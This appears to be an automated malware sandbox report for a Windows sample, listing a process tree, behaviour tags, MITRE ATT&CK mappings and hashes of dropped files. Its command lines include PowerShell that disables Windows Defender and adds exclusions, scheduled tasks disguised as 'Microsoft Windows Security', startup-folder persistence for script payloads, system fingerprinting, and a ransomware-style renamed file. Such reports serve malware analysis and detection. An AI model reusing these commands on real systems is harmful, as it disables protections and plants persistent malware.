C:\Windows\SysWOW64\timeout.exetimeout 15⤵
- Delays execution with timeout.exe
PID:3000
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c shadow.bat >NUL 2>NUL4⤵PID:2312
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\softina.exe"C:\Users\Admin\AppData\Local\Temp\Files\softina.exe"3⤵
- System Location Discovery: System Language Discovery
PID:8328 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\softina.exe"; Add-MpPreference -ExclusionProcess "softina.exe"; exit"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5256
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ji2xlo1f.exe"C:\Users\Admin\AppData\Local\Temp\Files\ji2xlo1f.exe"3⤵PID:11308
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"3⤵PID:8460
-
-
C:\Users\Admin\AppData\Local\Temp\Files\666.exe"C:\Users\Admin\AppData\Local\Temp\Files\666.exe"3⤵PID:11884
-
-
C:\Users\Admin\AppData\Local\Temp\Files\MJPVgHw.exe"C:\Users\Admin\AppData\Local\Temp\Files\MJPVgHw.exe"3⤵PID:7868
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵PID:12008
-
-
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe"4⤵PID:12000
-
-
C:\Windows\system32\audiodg.exe"C:\Windows\system32\audiodg.exe"4⤵PID:12044
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\aaa.exe"C:\Users\Admin\AppData\Local\Temp\Files\aaa.exe"3⤵PID:11248
-
-
C:\Users\Admin\AppData\Local\Temp\Files\xxxx.exe"C:\Users\Admin\AppData\Local\Temp\Files\xxxx.exe"3⤵PID:2800
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:6180
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:6392
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Software.exe"C:\Users\Admin\AppData\Local\Temp\Files\Software.exe"3⤵PID:8752
-
C:\Users\Admin\AppData\Local\Temp\Files\Software.exe"C:\Users\Admin\AppData\Local\Temp\Files\Software.exe"4⤵PID:7144
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\Software.exe'"5⤵PID:6988
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\Software.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:8124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵PID:9148
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Command and Scripting Interpreter: PowerShell
PID:8356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:9528
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:6860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:10524
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵PID:8580
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"5⤵PID:10744
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 26⤵PID:9260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"5⤵PID:8084
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 26⤵PID:9436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:10052
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:9220
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\si.exe"C:\Users\Admin\AppData\Local\Temp\Files\si.exe"3⤵PID:10036
-
-
C:\Users\Admin\AppData\Local\Temp\Files\RambledMime.exe"C:\Users\Admin\AppData\Local\Temp\Files\RambledMime.exe"3⤵PID:8368
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:9976
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe5⤵PID:6848
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe5⤵PID:9104
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\main.exe"C:\Users\Admin\AppData\Local\Temp\Files\main.exe"3⤵PID:8268
-
C:\Users\Admin\AppData\Local\Temp\Files\main.exe"C:\Users\Admin\AppData\Local\Temp\Files\main.exe"4⤵PID:3592
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff8702ccc40,0x7ff8702ccc4c,0x7ff8702ccc583⤵PID:1864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1932,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=1928 /prefetch:23⤵PID:3864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2160,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2192 /prefetch:33⤵PID:1692
-
-
    - C:\Program Files\Google\Chrome\Application\chrome.exe (level 3, PID 3944)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2184,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2288 /prefetch:8
    - C:\Program Files\Google\Chrome\Application\chrome.exe (level 3, PID 2716)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3184 /prefetch:1
    - C:\Program Files\Google\Chrome\Application\chrome.exe (level 3, PID 3064)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3220 /prefetch:1
    - C:\Program Files\Google\Chrome\Application\chrome.exe (level 3, PID 1392)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4544,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4580 /prefetch:1
    - C:\Program Files\Google\Chrome\Application\chrome.exe (level 3, PID 1504)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4808,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4780 /prefetch:8
    - C:\Program Files\Google\Chrome\Application\chrome.exe (level 3, PID 4432)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4948,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4812 /prefetch:8
    - C:\Program Files\Google\Chrome\Application\chrome.exe (level 3, PID 520)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4940,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5084 /prefetch:1
    - C:\Program Files\Google\Chrome\Application\chrome.exe (level 3, PID 4188)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3736,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4456 /prefetch:8
      - Modifies registry class
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of SetWindowsHookEx
    - C:\Program Files\Google\Chrome\Application\chrome.exe (level 3, PID 5476)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3332,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4460 /prefetch:8
      - Modifies registry class
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of SetWindowsHookEx
    - C:\Program Files\Google\Chrome\Application\chrome.exe (level 3, PID 4412)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4560,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3176 /prefetch:8
    - C:\Program Files\Google\Chrome\Application\chrome.exe (level 3, PID 10712)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3312,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4900 /prefetch:2
      - Loads dropped DLL
    - C:\Program Files\Google\Chrome\Application\chrome.exe (level 3, PID 10936)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3496,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=1988 /prefetch:2
      - Loads dropped DLL
    - C:\Program Files\Google\Chrome\Application\chrome.exe (level 3, PID 9184)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2096,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3828 /prefetch:2
      - Loads dropped DLL
    - C:\Program Files\Google\Chrome\Application\chrome.exe (level 3, PID 7400)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=4604,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3292 /prefetch:2
      - Loads dropped DLL
  - C:\Windows\SysWOW64\cmd.exe (level 2, PID 2520)
    Command line: cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & echo URL="C:\Users\Admin\AppData\Local\TechMesh Dynamics\InnoMesh.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & exit
    - Drops startup file
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 2, PID 5704)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - C:\Windows\System32\Conhost.exe (level 3, PID 2160)
      Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  - C:\Windows\System32\schtasks.exe (level 2, PID 1200)
    Command line: C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  - C:\Windows\SysWOW64\cmd.exe (level 2, PID 5260)
    Command line: cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\Admin\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
    - C:\Windows\SysWOW64\schtasks.exe (level 3, PID 5244)
      Command line: schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\Admin\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
      - System Location Discovery: System Language Discovery
      - Scheduled Task/Job: Scheduled Task
  - C:\Windows\SysWOW64\cmd.exe (level 2, PID 6136)
    Command line: cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & echo URL="C:\Users\Admin\AppData\Local\GreenTech Dynamics\EcoCraft.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & exit
    - Drops startup file
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 2, PID 348)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
    - Command and Scripting Interpreter: PowerShell
  - C:\Windows\System32\conhost.exe (level 2, PID 1736)
    Command line: C:\Windows\System32\conhost.exe
  - C:\Windows\System32\dwm.exe (level 2, PID 1984)
    Command line: C:\Windows\System32\dwm.exe
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
  - C:\Windows\SysWOW64\cmd.exe (level 2, PID 5348)
    Command line: cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduCraft.url" & echo URL="C:\Users\Admin\AppData\Local\EduInno Dynamics\EduCraft.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduCraft.url" & exit
    - Drops startup file
    - System Location Discovery: System Language Discovery
  - C:\Users\Admin\AppData\Local\Temp\8213.tmp.x.exe (level 2, PID 6884)
    Command line: "C:\Users\Admin\AppData\Local\Temp\8213.tmp.x.exe"
- C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe (level 1, PID 3140)
  Command line: "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
- C:\Windows\system32\svchost.exe (level 1, PID 3780)
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
- C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe (level 1, PID 5700)
  Command line: "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
- C:\Program Files (x86)\Mesh Agent\MeshAgent.exe (level 1, PID 2320)
  Command line: "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
- C:\Windows\system32\vssvc.exe (level 1, PID 7916)
  Command line: C:\Windows\system32\vssvc.exe
- C:\Windows\SysWOW64\WerFault.exe (level 1, PID 1452)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4532 -ip 4532
- C:\Windows\system32\dwm.exe (level 1, PID 10280)
  Command line: "dwm.exe"
  - Checks SCSI registry key(s)
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
- C:\Windows\SysWOW64\WerFault.exe (level 1, PID 8556)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 7900 -ip 7900
- C:\Users\Admin\AppData\Roaming\Apaches hotbed.exe (level 1, PID 10092)
  Command line: "C:\Users\Admin\AppData\Roaming\Apaches hotbed.exe"
- C:\ProgramData\explorer.exe (level 1, PID 3768)
  Command line: "C:\ProgramData\explorer.exe"
  - System Location Discovery: System Language Discovery
  - C:\Windows\SysWOW64\WerFault.exe (level 2, PID 3032)
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 520
    - Program crash
- C:\Windows\system32\wscript.EXE (level 1, PID 11448)
  Command line: "C:\Windows\system32\wscript.EXE" //B "C:\Users\Admin\AppData\Local\GreenTech Dynamics\EcoCraft.js"
- C:\Windows\SysWOW64\WerFault.exe (level 1, PID 11480)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5920 -ip 5920
- C:\Windows\SysWOW64\WerFault.exe (level 1, PID 1756)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5012 -ip 5012
- C:\Windows\system32\dwm.exe (level 1, PID 7780)
  Command line: "dwm.exe"
  - Checks SCSI registry key(s)
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
- C:\Windows\System32\GameBarPresenceWriter.exe (level 1, PID 10712)
  Command line: "C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
  - Network Service Discovery
- C:\Windows\system32\OpenWith.exe (level 1, PID 9016)
  Command line: C:\Windows\system32\OpenWith.exe -Embedding
- C:\Windows\system32\svchost.exe (level 1, PID 4264)
  Command line: C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
- C:\Windows\explorer.exe (level 1, PID 8396)
  Command line: explorer.exe
- C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe (level 1, PID 8636)
  Command line: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
- C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe (level 1, PID 9508)
  Command line: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
- C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe (level 1, PID 8076)
  Command line: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
- C:\Windows\SysWOW64\WerFault.exe (level 1, PID 10192)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 11476 -ip 11476
- C:\Windows\explorer.exe (level 1, PID 9340)
  Command line: explorer.exe
Network
MITRE ATT&CK Enterprise v15 (technique, number of matching signatures)
Execution
- Command and Scripting Interpreter (2)
  - JavaScript (1)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
- System Services (1)
  - Service Execution (1)
- Windows Management Instrumentation (1)
Persistence
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (2)
- Create or Modify System Process (3)
  - Windows Service (3)
- Modify Authentication Process (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Access Token Manipulation (1)
  - Create Process with Token (1)
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (2)
- Create or Modify System Process (3)
  - Windows Service (3)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Access Token Manipulation (1)
  - Create Process with Token (1)
- Direct Volume Access (1)
- Hide Artifacts (2)
  - Hidden Files and Directories (2)
- Impair Defenses (5)
  - Disable or Modify Tools (4)
- Indicator Removal (2)
  - File Deletion (2)
- Modify Authentication Process (1)
- Modify Registry (8)
- Subvert Trust Controls (1)
  - Install Root Certificate (1)
- Virtualization/Sandbox Evasion (2)
Credential Access
- Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
- Modify Authentication Process (1)
- Steal Web Session Cookie (1)
- Unsecured Credentials (3)
  - Credentials In Files (3)
Discovery
- Browser Information Discovery (1)
- Network Service Discovery (1)
- Peripheral Device Discovery (2)
- Process Discovery (1)
- Query Registry (10)
- System Information Discovery (8)
- System Location Discovery (1)
  - System Language Discovery (1)
- Virtualization/Sandbox Evasion (2)
Downloads
- Filesize: 431KB
  MD5: 62383df45e21d63ade58edd0e4aad4fa
  SHA1: b116602ae29c0f2bd87f785694fab20791be6362
  SHA256: f70944c7906d938c143b66f8c943f60daba949c956fef8898f55d37aafdfd88e
  SHA512: ca9f8a37a74bffa628a0c3791cd9cdbb463c8b47bfe260da857a4b497d6b67411bad1c630d450804b86a50043800d839f3a162f4b464eeed8ad48e123a9e3343
- C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems64.dll.id-F0D1BDE8.[[email protected]].ncov
  Filesize: 3.2MB
  MD5: 06042095094d9fae4b49c98d54e59feb
  SHA1: 28f22d4758550879738e9cdb00cc1e059adfdc58
  SHA256: 0860e896f05cf4a350a7fdc33e89810b6ef089ed5ce94ae9c36e5045bc727d7f
  SHA512: e0fe59194b0ccaca729a42b3221879cb073657d8e1daf1261983fb32e3631d7d153d1edac409f1acb4ddc364d5d474dc98e8d9f60fbb8657a9d175da242d56cb
- Filesize: 40B
  MD5: c57dc4430acd2f6349d8d3acaf0641de
  SHA1: 0500f53dea3c088dce37ff3c7ab2a3b1e3aae3c1
  SHA256: 84a0677c6683aa47b58f5f165a013c5b65e2bd3fbc5622d63c9d5c790ddff86e
  SHA512: 4466e3d079aadfc94225006a3d0c545b51ce7acf8f401f0794ebaa25fc877dab0fe4aab33d47fbf9cd6198eebbce97802fe83c7ef65e4fdad839dd9d83565023
- Filesize: 649B
  MD5: 62533a825caa4d4850421db3e44b4c26
  SHA1: 8b1ed35fdb19c8ca39c0ef1128fc4adf496c4024
  SHA256: b856d742549ce2ddf4d0feace1fa08ac2df52f8cd761b71ec0f69472e4af46e1
  SHA512: f5d5e441996372a0388537a163cbb5462e36d59c80aa3e25a0ebd4d4c2f9ac968309dd9a5760c668057caf48e972b718299ff460addcddbaddcad96c53fef3dc
- Filesize: 336B
  MD5: 1a3da51be5d81b5def636bced1d04d14
  SHA1: ba4fa494a53268267606d72183f9fa1580c41554
  SHA256: cf1e498ca87e185aca3ee4638953062e77e4041212314512d62860cf6ea087db
  SHA512: d4f85ecae9935c2854c3e4cae9f42de0443abf7813e14dcd59026f828311545027bf1eab339a397f0d4d428519c34eb3c9e45da32aadcac449a8e7a7fb545b7b
- Filesize: 264KB
  MD5: 3062dc0cc9f5ba8c99ebbbd51a07717d
  SHA1: 4d038b3ba619731727260de60a72038693ceee1c
  SHA256: a9eae0395907b9d363a05e8039b93833527b5cc6c34fcd3b1ab6731700ac0358
